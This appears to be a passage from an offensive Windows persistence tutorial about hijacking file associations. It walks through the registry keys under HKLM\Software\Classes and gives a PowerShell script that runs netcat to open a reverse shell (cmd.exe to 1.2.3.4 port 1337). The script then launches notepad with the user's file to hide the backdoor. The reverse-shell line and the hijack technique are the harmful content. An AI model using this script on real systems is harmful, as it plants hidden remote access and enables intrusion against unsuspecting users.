Hijacking file associations is the same basic idea as hijacking shortcut files. This is a two-step process.
- Locate the “programmatic ID” of the extension you wish to hijack under
HKLM\Software\Classes(this will be the key’s(Default)value). - The programmatic ID will also be in
HKLM\Software\Classesand will have the command path as the(Default)value for itsshell\open\commandkey.
Note that the programmatic ID command will probably include the %1 placeholder, which is used to pass in the file path. This requires a slightly different script than is used to backdoor shortcuts:
# Create a reverse shell (note that netcat is something that
# the attacker need to provide themselves!)
#
Start-Process -NoNewWindow "C:\Windows\System32\nc.exe" `
"-e cmd.exe 1.2.3.4 1337"
# Fire off the application the user is expecting and pass in
# the supplied file path
#
C:\Windows\System32\notepad.exe "$args"Note the quoting here, as well as the inclusion of the entire $args array. Most of the documentation I’ve found online suggests using $args[0] as an unquoted argument, but this approach did not work in my testing.